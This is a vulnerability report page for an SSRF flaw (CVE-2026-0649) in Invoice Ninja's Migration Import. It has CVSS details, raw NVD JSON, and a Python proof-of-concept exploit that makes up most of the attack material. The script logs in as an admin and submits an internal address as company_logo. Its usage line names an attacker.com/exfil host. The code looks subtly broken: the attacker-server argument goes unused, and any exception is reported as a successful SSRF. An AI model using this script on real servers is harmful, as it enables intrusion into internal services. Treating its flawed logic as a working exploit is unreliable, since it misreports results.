Security Vulnerability Report
CVE-2026-0649 CVSS 4.7 MEDIUM

CVE-2026-0649

Published: 2026-01-07 12:17:08
Last Modified: 2026-04-29 01:00:02

Description

A security vulnerability has been detected in invoiceninja up to 5.12.38. The affected element is the function copy of the file /app/Jobs/Util/Import.php of the component Migration Import. The manipulation of the argument company_logo leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Invoice Ninja < 5.12.38

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2026-0649 PoC - Invoice Ninja SSRF via Migration Import
# Target: Invoice Ninja <= 5.12.38
# Attack Vector: company_logo parameter in Migration Import

def exploit_ssrf(target_url, internal_target, attacker_server):
    """
    Exploit SSRF vulnerability in Invoice Ninja Migration Import
    target_url: Base URL of Invoice Ninja instance
    internal_target: Internal service to target (e.g., 'http://127.0.0.1:22')
    attacker_server: Attacker's server to receive internal response
    """
    # Login to get session
    login_url = f"{target_url}/login"
    session = requests.Session()

    # Credentials for high-privilege user
    credentials = {
        'email': '[email protected]',
        'password': 'admin_password'
    }

    # Login request
    login_response = session.post(login_url, data=credentials)
    if login_response.status_code != 200:
        print("[-] Login failed")
        return False

    # Navigate to Migration Import functionality
    import_url = f"{target_url}/settings/import_export"

    # Prepare SSRF payload via company_logo parameter
    # The vulnerable parameter accepts URL for company logo
    ssrf_payload = {
        'company_logo': internal_target,  # e.g., http://127.0.0.1:8080
        'import_type': 'json',
        'data_file': open('malicious_data.json', 'rb')
    }

    # Send malicious request
    try:
        response = session.post(import_url, files=ssrf_payload, timeout=10)
        print(f"[*] Request sent to: {internal_target}")
        print(f"[*] Response status: {response.status_code}")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[*] SSRF triggered - internal request made to: {internal_target}")
        return True

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2026-0649_poc.py <target_url> <internal_target> <attacker_server>")
        print("Example: python cve-2026-0649_poc.py http://vulnerable-invoice-ninja.com http://127.0.0.1:22 http://attacker.com/exfil")
        sys.exit(1)

    target = sys.argv[1]
    internal = sys.argv[2]
    attacker = sys.argv[3]
    exploit_ssrf(target, internal, attacker)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0649", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:07.547", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in invoiceninja up to 5.12.38. The affected element is the function copy of the file /app/Jobs/Util/Import.php of the component Migration Import. The manipulation of the argument company_logo leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://note-hxlab.wetolink.com/share/fWqEpn5fX4rH", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.339720", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.339720", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.721323", "source": "[email protected]"}]}}